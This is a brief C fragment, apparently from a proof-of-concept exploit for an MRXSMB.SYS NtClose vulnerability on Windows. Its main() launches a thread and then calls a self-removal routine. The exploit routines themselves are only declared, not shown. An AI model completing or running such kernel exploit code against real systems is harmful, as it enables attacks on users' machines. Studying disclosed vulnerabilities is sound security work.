
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ LPTHREAD_START_ROUTINE ;
typedef int DWORD ;


 int CreateThread (int *,int ,scalar_t__,int ,int ,int *) ;
 scalar_t__ IamAlive ;
 int KillMySelf () ;
 int printf (char*) ;

int main(int argc, char *argv[])
{

 LPTHREAD_START_ROUTINE GoodThread;
 DWORD dwThreadId;
 DWORD bResult;
 GoodThread=(LPTHREAD_START_ROUTINE)IamAlive;


  printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
  printf("\t(Only for educational purposes)\n");
  printf("..http://www.reversemode.com..\n\n");
  printf("Launching Thread ...");



  CreateThread(((void*)0),0,GoodThread,0,0,&dwThreadId);


  printf("Done\n");
  printf("I am going to dissapear,but I will be with you forever\n");
  printf("(..)\n\n");
  KillMySelf();

  return(1);
}
